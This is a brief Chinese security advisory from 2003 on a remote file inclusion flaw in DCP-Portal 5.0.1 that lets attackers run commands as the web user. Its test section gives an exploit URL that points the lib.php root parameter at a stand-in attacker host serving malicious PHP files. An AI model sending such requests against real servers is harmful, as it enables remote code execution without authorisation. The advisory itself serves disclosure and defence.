DCP-Portal远程文件包含执行命令漏洞发布时间:2003-01-06 更新时间:2003-01-06 严重程度:高 威胁程度:普通用户访问权限 错误类型:输入验证错误 利用方式:服务器模式 BUGTRAQ ID:6525 受影响系统 DCP-Portal DCP-Portal 5.0.1详细描述 DCP-Portal是一款用php写的网站内容管理系统。 DCP-Portal存在一个漏洞,远程攻击者可以包含远程主机的任意文件,如果该文件是恶意的PHP脚本,远程攻击者就可以以web用户的权限执行任意命令。 测试代码 "Frog Man" <leseulfrog@hotmail.com> 提供了如下测试方法: http://[target]/library/lib.php?root=http://[attacker ] with - http://[attacker]/library/lib_nav.php - http://[attacker]/library/lib_mods.php - http://[attacker]/library/lib_admin.php - http://[attacker]/library/lib_3rd.php 相关信息 发现者:"Frog Man" <leseulfrog@hotmail.com> 相关资料:http://online.securityfocus.com/archive/1/305358 |
